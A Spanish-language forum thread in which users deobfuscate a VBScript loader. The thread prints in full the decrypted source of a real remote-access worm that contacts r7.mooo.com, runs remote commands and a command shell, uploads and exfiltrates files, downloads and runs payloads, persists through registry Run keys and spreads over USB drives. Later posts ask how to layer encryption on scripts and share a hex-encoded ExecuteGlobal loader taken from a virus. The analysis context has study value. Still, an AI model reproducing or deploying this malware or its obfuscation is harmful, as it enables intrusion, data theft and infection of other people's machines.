ŸYŒŒ——85—ž"'K™šŸKš£ŽYžŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸYŒŒ——85—žK85KKKŒŒ——'š˜Œ™¤KhKMM85™K"'8585Ž˜ž"——KhKŒŒ——'š˜Œ™¤85™K' ™ŽŸ"š™"))
sddfskcIdCLcsoSkso()
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
next
executeglobal hsDCcocssccCaVICC
End Function
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
dcssLdchdcdDCsiijSS = i
Loop While sStr <> bLen
End Function


                                          Gracia de antemano.  :laugh:




Shell Root

#1
Pues lo bueno de aquí, es que puedes ver como se decifra el string encodeado, así hay que seguir la secuencia:

La string encodeada:
Código (vb) [Seleccionar]
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b

Está es la función para descifrar el encode, a modo de ejemplo sólo tome los primeros 2 caracteres del encode, que en realidad serian 5
Código (vb) [Seleccionar]
dDssDajcooSLscaC = ((""š"))
msgbox dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)

Function dcssLdchdcdDCsiijSS(sStr)
   Do
       i = i + &H1             ' &H1 Es hexadecimal que equivale a 1, es decir, incrementa la variable i de 1 en 1, manteniendo el valor
       bLen = Left(sStr, i)    ' Recorre el encode de izquierda al valor incrementado de i
       dcssLdchdcdDCsiijSS = i ' Devuelve el valor real del tamaño de la cadena encodeada
   Loop While sStr <> bLen
End Function


La siguiente función es la que se encarga de descifrar el valor del encode, veamos:
Código (vb,3) [Seleccionar]
Function sddfskcIdCLcsoSkso()
    For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC) ' Toma la función anterior para obtener el tamaño real del encode
        hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
    Next
    ExecuteGlobal hsDCcocssccCaVICC ' Ejecución del encode
End Function


En la Linea 3, es donde esta el decifrado el usa las siguientes funciones:
Código (vb) [Seleccionar]
CHRW ' devuelve un carácter Unicode; sin embargo, en los sistemas que no son compatibles con el conjunto de caracteres Unicode, la función se comporta de forma idéntica a CHR.
ASC ' Convierte el primer carácter de una cadena en código ANSI y devuelve el resultado.
MID ' Devuelve un número específico de caracteres de una cadena.


Veamos la conversión con las dos primeros caracteres del encode,

[AHORA SIGO xD]
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

ThunderCls

Esta es una técnica muy usada en malware vbs o cualquier otro tipo de script y es bien sencillo obtener el decifrado, lo unico que se necesita es sustituir la linea #7:

Código (vb) [Seleccionar]
executeglobal hsDCcocssccCaVICC

por las siguientes:

Código (vb) [Seleccionar]
Set file = fso.CreateTextFile("D:\decrypted.txt", True)
file.write(hsDCcocssccCaVICC)
file.close


Luego en "decrypted.txt" estará el código descifrado del malware. Aquí lo paso luego de descifrarlo y arreglar algún que otro caracter. Es básicamente una variante de un malware que analice hace ya algún tiempo en mi blog

(AVISO: NO EJECUTAR DIRECTAMENTE EN EL S.O PRINCIPAL, ESTA ES UNA MUESTRA REAL DE UN MALWARE REAL. Avisados quedan todos)

Código (vb) [Seleccionar]
host = "r7.mooo.com"
port = 9371
installdir = "%appdata%"
lnkfile = true
lnkfolder = false


dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")



installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce


on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver 
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param) 
case  "delete"
      param = cmd (1)
      deletefaf (param)
case  "exit-process"
      param = cmd (1)
      exitprocess (param)
case  "sleep"
      param = cmd (1)
      sleep = eval (param)       
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(folder.name," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path)
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter 
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf 
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
     .type = 1
     .open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else
   readallfromany = ""
end if

cmdshell = readallfromany
end function

-[ "...I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/

**Aincrad**

Muy bueno gracias . ya entendí. 

una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:

Código (actionscript) [Seleccionar]
msgbox "prueba de cifrado"

como lo encriptaria con por lo menos 3 capas de cifrado ?




MCKSys Argentina

Cita de: **Aincrad** en 22 Octubre 2017, 16:55 PM
Muy bueno gracias . ya entendí. 

una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:

Código (actionscript) [Seleccionar]
msgbox "prueba de cifrado"

como lo encriptaria con por lo menos 3 capas de cifrado ?

Por lo que veo, es cifrado CAESAR: https://en.wikipedia.org/wiki/Caesar_cipher

Cita de: **Aincrad** en 19 Octubre 2017, 15:59 PM

Código (actionscript) [Seleccionar]

***
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
***


No es difícil implementar ese cifrado con las pasadas que quieras.

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


**Aincrad**

ah , ok .

bueno yo convierto el texto a hex y me baso en este viejo virus wsf .

Código (actionscript) [Seleccionar]
<?XML version="1.0"?><job>

<script language="VBScript">

<![CDATA[

FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")

ExecuteGlobal FACEBOOKFACEBOOK

Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function

]]>

</script>

</job>


el code que pase a hex fue msgbox "hola" que al pasarlo quedo
6D7367626F782022686F6C6122 y como me base en este code puedo codificar cualquier vbs.

y en cualquier caso para descifrar el code , según lo que me acaban de explicar quedaría asi:

Código (actionscript) [Seleccionar]
<?XML version="1.0"?><job>

<script language="VBScript">

<![CDATA[

FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")

Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function

Set fso = CreateObject("scripting.filesystemobject")
Set fichero = fso.CreateTextFile("decrypted.txt", True)
fichero.write(FACEBOOKFACEBOOK)
fichero.close

]]>

</script>

</job>


Gracias por las explicaciones . .  ;-)